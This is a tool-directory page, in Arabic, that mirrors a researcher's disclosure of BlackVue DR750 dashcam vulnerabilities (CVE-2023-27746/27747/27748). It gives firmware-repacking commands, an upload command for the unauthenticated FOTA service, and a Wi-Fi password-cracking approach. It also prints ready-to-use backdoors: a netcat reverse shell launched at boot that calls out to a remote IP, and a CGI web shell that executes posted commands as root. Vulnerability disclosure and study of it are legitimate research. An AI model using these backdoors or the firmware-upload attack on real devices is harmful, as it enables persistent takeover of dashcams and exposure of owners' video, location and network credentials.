Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
blackvue-cve-2023 — BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748 | Kitploit
أدوات/GitHubGitHub/eyjhb/blackvue-cve-2023
أمان الأنظمة المدمجةتدقيق Wi-Fiأمان إنترنت الأشياءهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتحليل البرامج الثابتة
GitHubeyjhb/blackvue-cve-2023

blackvue-cve-2023

BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748

102منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

ثغرات BlackVue DR750 (والمزيد)

ما يلي هو لأغراض تعليمية فقط، لا تجرب هذا على أي جهاز لا تملكه أو ليس لديك إذن باستخدامه.

حتى وقت كتابة هذا التقرير، هناك حوالي 300 جهاز BlackVue ضعيف متصل بالإنترنت، يمكن اكتشافها واستغلالها بسهولة، ولا يوجد تصحيح رسمي حتى الآن.

تم إبلاغ BlackVue بهذه الثغرات في 30-07-2022، وردوا بأنهم سينظرون في المشكلات. ومع ذلك، لم يحدث شيء على حد علمنا.

زرع باب خلفي في الجهاز (CVE-2023-27748)

عدم وجود فحص مصادقة البرنامج الثابت

لا يوجد فحص للمصداقية للبرنامج الثابت، مما يسمح لمهاجم ضار بتحميل برنامج ثابت مخصص. يمكن أن يتضمن هذا البرنامج الثابت المخصص أبوابًا خلفية أو استغلالات.

خطوات إعادة الإنتاج:

  1. تحميل أرشيف البرنامج الثابت من موقع BlackVue الإلكتروني
  2. فك ضغط ملف .zip الذي يحتوي على ملفات البرنامج الثابت
  3. فك ضغط الصورة patch_<dashcam_name>.bin
  4. تغيير/إضافة الملفات المطلوبة (راجع أمثلة الأبواب الخلفية)
  5. إعادة ضغط الصورة بصيغة tar.gz
  6. حساب المجموع الاختباري sue للملف الجديد patch_<dashcam_name>.bin (راجع sue_checksum)
root@kitploit:~
# downloaded from https://blackvue.com/download/dr750-2ch-lte-firmware-multilanguage/
$ unzip dr750-2ch-lte-v1.012-eng.zip
$ cd BlackVue/System/upgrade
$ mkdir patch-out
$ tar -C patch-out -xvzf patch_DR750LTE.bin
# make changes in patch-out
$ tar -C patch-out -czvf patch_DR750LTE.bin .
$ python3 sue_checksum.py patch_DR750LTE.bin patch_DR750LTE.bin.sue
$ cd ../../../

ثم ضع المجلد BlackVue على بطاقة SD الخاصة بكاميرا dashcam، وستبدأ في تشغيله.

عند إنشاء برنامج ثابت لـ FOTA (تحديث البرنامج الثابت عبر الهواء)، قم بإنشاء ملف .tgz من الدليل System بدلاً من ذلك.

root@kitploit:~
$ tar -C BlackVue/System -czvf fwupgrade.tgz

يمكن استخدام هذا الملف لاحقًا لتحميل برنامج ثابت مخصص باستخدام FOTA والاستيلاء الكامل على كاميرا dashcam.

من المهم ملاحظة أنه أثناء الاختبار، لوحظ أنه حتى عند إعادة تحميل البرنامج الثابت الرسمي من موقع BlackVue إلى الجهاز، استمرت الأبواب الخلفية الموضوعة.

بروتوكول FOTA (تحديث البرنامج الثابت عبر الهواء) غير الموثّق

ستستمع كاميرات BlackVue dashcam على المنفذ 9771/TCP، حيث تعمل خدمة FOTA (البرنامج الثابت عبر الهواء). تسمح هذه الخدمة بـ ping، إعادة التشغيل، الحصول على وقت الجهاز، ترقية البرنامج الثابت، إلخ.

لا يوجد شيء يحمي نقطة النهاية هذه ويمكن الوصول إليها عند الاتصال بنفس الشبكة المحلية للكاميرا أو من الإنترنت إذا كانت الكاميرا متصلة بـ LTE، مما يشكل خطرًا أمنيًا كبيرًا. يمكن العثور على برنامج Python النصي الذي يمكنه التواصل مع خدمة FOTA هنا.

قم بإنشاء برنامج ثابت جديد بناءً على الخطوات من القسم السابق، وقم بتحميله باستخدام البرنامج النصي Python.

root@kitploit:~
python software/fota/fota.py 10.0.0.1 upgrade /tmp/fwupgrade.tgz

لا توجد ضمانات بأن هذه الأداة تعمل، لكنها عملت مرة واحدة من قبل.

عدم وجود جدار ناري

كاميرات dashcam لا تأتي مع أي جدار ناري ممكّن، وهو أقل مشكلة إذا كانت الكاميرا متصلة فقط عبر Wi-Fi. ومع ذلك، فإن إصدار LTE متصل مباشرة بالإنترنت، حيث أن بعض مزودي الهاتف المحمول لا يقومون بإعداد جدار ناري ولا يضعون مستخدميهم خلف NAT. يمكن التحقق من ذلك من خلال النظر في البرنامج الثابت المستخرج.

على الأقل، يجب أن تقوم كاميرات BlackVue dashcam المزودة بـ LTE بحظر الاتصالات على جانب LTE.

كلمة مرور Wi-Fi الافتراضية غير الآمنة (CVE-2023-27746)

كلمة مرور Wi-Fi الافتراضية لكاميرا dashcam تتكون فقط من أحرف أبجدية رقمية صغيرة، بطول 8. من الممكن اعتراض مصافحة من الكاميرا، واستخدام أدوات من Aircrack-ng لحساب كلمة المرور (إذا لم يقم المستخدم بتغييرها). يمكن القيام بذلك في حوالي 4 أيام باستخدام أجهزة مستأجرة (حوالي 40 يورو).

خادم ويب غير موثّق (CVE-2023-27747)

بشكل افتراضي، يمكن الوصول إلى خادم الويب بدون مصادقة ويكشف عن نقاط نهاية مختلفة.

root@kitploit:~
├── blackvue_live.cgi
├── blackvue_livedata.cgi
├── blackvue_vod.cgi
├── Config
├── index.html
├── Record
└── upload.cgi

تسمح نقاط النهاية هذه بما يلي:

  1. البث المباشر للكاميرا
  2. بث البيانات المباشرة (الموقع، السرعة، إلخ.)
  3. تنزيل جميع التسجيلات من الكاميرا
  4. تحميل تكوين مخصص للكاميرا
  5. تنزيل التكوين الحالي من الكاميرا 5.1. يتضمن ذلك معلومات Wi-Fi محتملة يمكن فك تشفيرها (انظر أعلاه)

تخزين غير آمن لكلمة مرور Wi-Fi على بطاقة SD

يتم تخزين SSID Wi-Fi وكلمة مرور الشبكة التي ستتصل بها الكاميرا على بطاقة SD في الكاميرا. يتم تشفير هذه البيانات، ولكن يمكن كشف المفتاح بسهولة عن طريق هندسة عكسية للتطبيق. كما هو موضح في wifi-decrypt.py.

من الجدير بالذكر أيضًا أنه عند تغيير شبكة Wi-Fi التي يجب أن تتصل بها الكاميرا، يتم إرسال هذه القيم إلى خوادم BlackVue، والتي ستخزنها حتى تتمكن من إرسال المعلومات إلى الكاميرا. ما إذا كانت هذه البيانات تُحذف عند توفر الكاميرا غير معروف.

الجمع بين هذه الهجمات

يمكن الجمع بين كل هذه لتحقيق تنفيذ تعليمات برمجية عن بعد بسيط، خاصة مع كاميرات LTE dashcam.

  1. صنع برنامج ثابت مخصص مع باب خلفي
  2. استخدام fota.py لتحميل البرنامج الثابت عن بُعد
  3. الاتصال بالباب الخلفي
  4. ???
  5. الربح

أمثلة الأبواب الخلفية

بعض الأمثلة على الأبواب الخلفية، التي يمكن تضمينها في البرنامج الثابت المخصص.

Netcat

الباب الخلفي التالي سيتصل بجهاز بعيد ويمنح وصول كامل إلى الصدفة كجذر.

/bin/backdoor.sh

root@kitploit:~
#!/bin/sh
IP=$1
PORT=$2

while /bin/true; do
    /usr/bin/nc $IP $PORT -e /bin/sh
done

سكربت init.d التالي سيبدأ الباب الخلفي عند كل إقلاع، ويتصل بعنوان IP/المنفذ المحدد. /etc/init.d/S85backdoor

root@kitploit:~
#!/bin/sh
/bin/backdoor 10.99.77.20 1745 &

cmd.cgi

الباب الخلفي التالي سيسمح بتنفيذ الأوامر (كجذر)، عند إرسال حمولة إلى خادم الويب.

/res/System/www/cmd.cgi

root@kitploit:~
#!/bin/sh

echo "Content-type: text/html"    # set the data-type we want to use
echo ""

POST_STRING=$(/bin/cat)
echo $POST_STRING
exec $POST_STRING
تنزيل الأداة